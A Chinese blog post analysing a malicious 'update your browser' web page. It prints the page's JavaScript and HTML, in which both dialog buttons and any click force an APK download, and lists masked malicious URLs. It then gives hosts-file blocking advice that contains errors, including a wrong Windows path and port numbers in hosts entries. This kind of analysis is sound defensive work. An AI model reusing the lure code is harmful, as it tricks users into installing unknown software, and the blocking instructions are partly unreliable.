SakaGHP Blog

“下载浏览器”类恶意网页研究

於 20年4月6日
作 Saka

二〇二〇年四月六日早上我发现了一个恶意网页。在我上网搜索资料的时候，突然弹出一个对话框让我升级浏览器，我拒绝后被下载浏览器。我向来很讨厌被这样强制下载安装软件。

二〇二〇年四月六日早上我发现了一个恶意网页。在我上网搜索资料的时候，突然弹出一个对话框让我升级浏览器，我拒绝后被下载浏览器。

【截图丢失】
我研究了一下，打开恶意网页，打开开发工具，我发现了三段特殊的代码：

1	var surl = "https://e17ec110af43.oss-＊-sha＊gh＊i.aliy＊ncs.com/apk/2020/01/xiazai_1735＊3_121＊98051.apk";

     function tanc() {
setTimeout(function(){
  var msg = confirm("浏览器版本过低，请立即更新");
       if (msg == true) {
         location.href = surl;
       }else{
         location.href = surl;
       }
},50);
     }
 // 省略了一些...
       function downapk() {
       // time2();
       var msg = confirm("提示： 请勿直接退出，否则会导致浏览器崩溃");
       if (msg == true) {
         location.href = surl;
       } else {
         console.log(1)
         location.href = surl;
       }
     }

代码的意思：
显示：“浏览器版本过低，请立即更新”，之后不管你按确定还是取消，它都会带你到surl变量的网址，也就是恶意网页的网址

<div class="liulanqi1bgobox" onclick="downapk()">
<div style=" position:fixed; top:5px; right:5px; width:35px; height:18px; line-height:18px; background:#000; color:#fff; font-size:12px;  text-align:center; border-radius:3px; opacity:0.1">广告</div>
      <div class="ql-head className" style="background-color: rgb(252, 72, 72);">请勿直接退出，下载最新版高速浏览器</div>
      <div class="ql-img"><img src="./static/chucuo-2.png"></div>
      <div class="ql-shilian">页面失联了！请立即更新...</div>

不管你点击网页的哪里，只要在div的范围内，它都会要求你的浏览器运行**downapk()**，就是下载apk。
病毒网址：
cdn.zhi＊anw.cc:3＊129/sg200319＊/sg.htm#
h＊ps:＊/mp.xi9＊.com/2019llq＊5/p10＊6z.html

2024年11月22日后记：下面的方法其实是治标不治本，一般最好的办法就是利用反广告插件，或者借助UserAgent和Platform伪装自己。

这些可以通过修改 hosts 文件来防止，在Linux/Unix/安卓系统里，hosts文件在 /etc/hosts，需要root权限修改，Windows系统中，hosts应该在%HOMEDRIVER%\System32\drivers\etc\hosts，需要用管理员权限修改。HOMEDRIVER是看系统在哪个硬盘安装，一般是C:。
在 hosts 文件中加入：

1 2	0.0.0.1 cdn.zh＊nanw.cc:32129 0.0.0.1 mp.＊i9p.com

这样就能能让系统禁止访问那个恶意网站，就能防止其自动下载文件了。